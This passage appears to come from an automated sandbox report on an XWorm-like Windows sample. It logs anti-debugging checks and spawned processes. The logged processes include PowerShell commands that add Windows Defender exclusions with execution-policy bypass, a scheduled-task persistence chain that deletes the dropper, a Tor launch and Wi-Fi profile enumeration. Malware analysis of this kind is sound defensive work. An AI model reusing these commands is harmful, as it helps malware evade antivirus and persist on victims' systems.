                Source: ffmaba.exe, 00000013.00000002.4541756048.0000000004091000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeCode function: 4_2_02A91DF4 CheckRemoteDebuggerPresent,4_2_02A91DF4
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe"
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe'
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe"Jump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe'Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Bypasses PowerShell execution policy
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe'
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe"Jump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess created: C:\Users\user\Desktop\yt7dW9nyJK.exe "C:\Users\user\Desktop\yt7dW9nyJK.exe"Jump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe'Jump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yt7dW9nyJK.exe'Jump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeProcess created: C:\Users\user\AppData\Local\Temp\ffmaba.exe "C:\Users\user\AppData\Local\Temp\ffmaba.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 3
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe "C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe" -f "C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /R /C:"[ ]:[ ]"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "SSID BSSID Signal"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "ffmaba" /sc minute /tr "c:\users\user\appdata\local\starlabs\ffmaba.exe" /rl highest /f && del /f /s /q /a "c:\users\user\appdata\local\temp\ffmaba.exe" &&start "" "c:\users\user\appdata\local\starlabs\ffmaba.exe"
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c chcp 65001 && timeout /t 3 > nul && schtasks /create /tn "ffmaba" /sc minute /tr "c:\users\user\appdata\local\starlabs\ffmaba.exe" /rl highest /f && del /f /s /q /a "c:\users\user\appdata\local\temp\ffmaba.exe" &&start "" "c:\users\user\appdata\local\starlabs\ffmaba.exe"
                Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000003024000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-cq
                Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000003024000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @\cq@\cq'PING!<Xwormmm>Program Manager<Xwormmm>0
                Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp, yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000003024000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $cq'PING!<Xwormmm>Program Manager<Xwormmm>0Tecq
                Source: yt7dW9nyJK.exe, 00000004.00000002.4513293791.0000000003024000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $cq'PING!<Xwormmm>Program Manager<Xwormmm>0TecqxF
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeQueries volume information: C:\Users\user\Desktop\yt7dW9nyJK.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeQueries volume information: C:\Users\user\Desktop\yt7dW9nyJK.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
